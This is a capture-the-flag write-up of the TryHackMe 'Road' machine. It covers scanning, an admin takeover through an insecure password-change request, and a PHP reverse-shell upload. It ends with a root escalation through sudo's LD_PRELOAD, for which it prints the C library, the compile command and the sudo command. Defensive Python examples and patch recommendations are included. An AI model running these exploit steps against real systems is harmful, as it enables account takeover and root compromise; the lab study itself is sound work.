d3vyce 095a13b2c9
add: writeup-ctf
2024-03-02 21:49:07 +01:00


---
title: "Writeup - Road (THM)"
date: 2022-04-08
slug: "writeup-road-thm"
type: "writeup-ctf"
---
This is a writeup for the [Road](https://tryhackme.com/room/road) machine from the TryHackMe site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV -T4 -Pn 10.10.57.115
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp: SSH (OpenSSH 8.2p1)
- 80/tcp: HTTP web server (Apache 2.4.41)
![](img/image-2.webp)
## Exploit
I start by enumerating the website's files.
![](img/image-3.webp)
On the main page I find a button that redirects to a login page. It is possible to create an account, so I start by doing that.
![](img/image-4.webp)
Once the account is created, I log in and see the following page:
![](img/image-5.webp)
In the `edit profil` section nothing can be modified except the profile picture, and on closer inspection a message says that only admins can perform that action... But it does give away one important piece of information: the admin's email!
![](img/image-6.webp)
After some more browsing of the site, I find another page that allows you to change your password. I change my password and capture the request sent to the server with Burp.
![](img/image-7.webp)
I notice that the account's email is sent along with the form, so I resend the request with my email replaced by the admin's. The server returns no error, and I can log in to the site's admin account!
![](img/image-8.webp)
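The password-change bug in miniature, as an added example that is not the site's code: the vulnerable handler takes the target account from an `email` form field the client controls, while the fixed handler acts only on the account bound to the server-side session and re-checks the current password. Accounts, emails and field names are constructed.

```python
import hashlib
import hmac
import os
from typing import Dict, Tuple

# Constructed user store: email -> (salt, PBKDF2 hash). Hashing instead of
# clear text also covers the "no clear-text passwords" recommendation.
Users = Dict[str, Tuple[bytes, bytes]]

def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_users() -> Users:
    users: Users = {}
    for email, pw in (("admin@example.test", "AdminPass1"),
                      ("attacker@example.test", "attacker")):
        salt = os.urandom(16)
        users[email] = (salt, _hash(pw, salt))
    return users

def check_login(users: Users, email: str, password: str) -> bool:
    rec = users.get(email)
    return rec is not None and hmac.compare_digest(_hash(password, rec[0]), rec[1])

def change_password_vulnerable(users: Users, session_email: str, form: dict) -> bool:
    # BUG: the account to update comes from a form field the client controls,
    # so replacing it with the admin's email resets the admin's password.
    target = form["email"]
    if target not in users:
        return False
    salt = os.urandom(16)
    users[target] = (salt, _hash(form["new_password"], salt))
    return True

def change_password_fixed(users: Users, session_email: str, form: dict) -> bool:
    # The account is the one bound to the server-side session. A submitted
    # email that differs from it is tampering: refuse (and log it, in practice).
    if form.get("email") not in (None, session_email):
        return False
    rec = users.get(session_email)
    if rec is None:
        return False
    # Re-authenticate with the current password before changing it.
    if not hmac.compare_digest(_hash(form["current_password"], rec[0]), rec[1]):
        return False
    salt = os.urandom(16)
    users[session_email] = (salt, _hash(form["new_password"], salt))
    return True
```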
Now that I'm admin, I can upload a new profile picture!
![](img/image-9.webp)
So I create a PHP reverse shell from the following template:
[pentestmonkey/php-reverse-shell (php-reverse-shell.php)](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)
{{< github repo="pentestmonkey/php-reverse-shell" >}}
I upload my `reverse.php` file through the profile image form. The upload raises no error; I just have to find where the file was stored on the server.
I look at the page's source code for any clue and find the following comment:
![](img/image-10.webp)
So I go to the following address:
```bash
10.10.57.115/v2/profileimages/reverse.php
```
![](img/image-11.webp)
I now have a reverse shell and can recover the first flag.
```bash
$ cat /home/webdeveloper/user.txt
63191e4ece37523c9fe6bb62a5e64d45
```
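How the profile-image form should have treated `reverse.php`, as an added example that is not the site's code: an extension allowlist, a magic-byte check, agreement between extension and content, a heuristic against image/PHP polyglots, and a server-chosen file name. The sample files are constructed; the checks are general upload hygiene, not the room's actual fix.

```python
import os
import secrets
from typing import Dict, Optional, Tuple

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
MAX_BYTES = 2 * 1024 * 1024
# Magic bytes of the image types the form should accept.
MAGIC = {b"\x89PNG\r\n\x1a\n": ".png", b"\xff\xd8\xff": ".jpg",
         b"GIF87a": ".gif", b"GIF89a": ".gif"}

def sniff_image(data: bytes) -> Optional[str]:
    """Extension implied by the content, or None if it is not an image."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None

def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason); each check is independent of the others."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:                  # rejects reverse.php outright
        return False, "extension not allowed"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    sniffed = sniff_image(data)
    if sniffed is None:                         # rejects PHP renamed to .png
        return False, "content is not an image"
    if sniffed != ext and not (sniffed == ".jpg" and ext == ".jpeg"):
        return False, "extension does not match content"
    if b"<?php" in data or b"<?=" in data:      # heuristic against polyglots
        return False, "embedded PHP tag"
    return True, "ok"

def stored_name(sniffed_ext: str) -> str:
    """Server-chosen random name; the client's name is never reused and the
    upload directory should have script execution disabled."""
    return secrets.token_hex(16) + sniffed_ext

# Constructed samples: the writeup's reverse.php, the same content renamed,
# a genuine PNG header, and a PNG/PHP polyglot.
SAMPLES: Dict[str, bytes] = {
    "reverse.php": b"<?php echo 1; ?>",
    "reverse.png": b"<?php echo 1; ?>",
    "avatar.png": b"\x89PNG\r\n\x1a\n" + bytes(32),
    "poly.png": b"\x89PNG\r\n\x1a\n" + b"<?php echo 1; ?>",
}

def audit_samples() -> Dict[str, str]:
    return {name: validate_upload(name, data)[1] for name, data in SAMPLES.items()}
```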
## Privilege escalation
I start by running [linPeas](https://linpeas.sh). In its output I find that MySQL and MongoDB are running on the machine...
I upgrade my shell with the following command:
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
Then I try to connect to MySQL without success, so I try MongoDB:
![](img/image-12.webp)
Now in Mongo, I list the databases with the following command:
![](img/image-13.webp)
After a little exploration, I find a `user` table in the `backup` database:
![](img/image-14.webp)
I can now connect via SSH as webdeveloper. I then check whether this user has sudo rights:
![](img/image-15.webp)
The `webdeveloper` user can run `sky_backup_utility` with root rights. The most interesting part, though, is the option `env_keep+=LD_PRELOAD`.
After some research I found this page:
[Sudo (LD_PRELOAD) (Linux Privilege Escalation) Touhids Blog](https://touhidshaikh.com/blog/2018/04/sudo-ld_preload-linux-privilege-escalation/)
In short, it explains that a library listed in `LD_PRELOAD` is loaded before the program itself, so its code runs with the program's privileges, here root. So I create a `bash.c` file with the following content:
```C
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setgid, setuid */

/* Runs when the library is loaded (with -nostartfiles, _init is ours),
 * i.e. before sky_backup_utility's main(), with the rights sudo granted. */
void _init() {
    unsetenv("LD_PRELOAD");   /* do not re-trigger in the spawned shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```
Then I compile it with the following command:
```bash
gcc -fPIC -shared -nostartfiles -o bash.so bash.c
```
I can now run the program with sudo, passing `LD_PRELOAD` so that our library is loaded, and its code executed, before the program starts:
```bash
sudo LD_PRELOAD=/home/webdeveloper/bash.so sky_backup_utility
```
![](img/image-16.webp)
I now have a root shell so I can get the last flag.
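A small sudoers audit for the setting abused above, as an added example that is not from the writeup: it flags any non-root user spec whose sudo environment preserves `LD_PRELOAD` (or `LD_LIBRARY_PATH`, which sudo likewise strips unless `env_keep` lists it). It handles only the subset of sudoers syntax shown; the sample file, the command path and the NOPASSWD tag are constructed assumptions.

```python
import re
from typing import Dict, List

# Variables that let a user inject code into a program sudo runs as root
# (sudo strips LD_* by default; env_keep re-enables them).
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH"}

# Constructed sudoers mirroring the finding above; the command path and
# the NOPASSWD tag are assumptions, not taken from the room.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults env_keep+=LD_PRELOAD
root ALL=(ALL:ALL) ALL
webdeveloper ALL=(ALL) NOPASSWD: /usr/bin/sky_backup_utility
"""

# Defaults[:user] env_keep += "VAR VAR"   (global, or scoped to one user)
ENV_KEEP_RE = re.compile(r'^Defaults(?::(?P<user>\S+))?\s+env_keep\s*\+?=\s*"?(?P<vars>[^"]+)"?')
# user HOST=(runas) [TAG:]... commands
SPEC_RE = re.compile(r'^(?P<user>\S+)\s+\S+=\([^)]*\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$')

def audit_sudoers(text: str) -> List[Dict]:
    """Report non-root user specs whose sudo environment keeps a dangerous variable."""
    lines = [l.strip() for l in text.splitlines()]
    lines = [l for l in lines if l and not l.startswith("#")]
    # Defaults apply wherever they appear in the file, so collect them first.
    kept: Dict[str, set] = {}          # "*" (global) or user -> preserved vars
    for line in lines:
        m = ENV_KEEP_RE.match(line)
        if m:
            scope = m.group("user") or "*"
            kept.setdefault(scope, set()).update(m.group("vars").replace(",", " ").split())
    findings = []
    for line in lines:
        m = SPEC_RE.match(line)
        if not m or m.group("user") == "root":
            continue
        user = m.group("user")
        bad = (kept.get("*", set()) | kept.get(user, set())) & DANGEROUS_ENV
        if bad:
            findings.append({"user": user, "command": m.group("cmds").strip(),
                             "env": sorted(bad), "nopasswd": "NOPASSWD:" in m.group("tags")})
    return findings
```

Removing the `env_keep+=LD_PRELOAD` line (or leaving sudo's default `env_reset` alone) makes the audit come back empty.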
## Recommendations
To patch this host I think the following actions would be necessary:
- Secure the password change page so that a user can only change their own password, never another user's
- Validate files uploaded to the server so that PHP code (or any other script) cannot be uploaded
- Do not store passwords in clear text in a database
- Secure access to the databases
- Do not let sudo preserve `LD_PRELOAD` (the `env_keep` option) for a program run with root rights, which is what makes the `LD_PRELOAD` exploit possible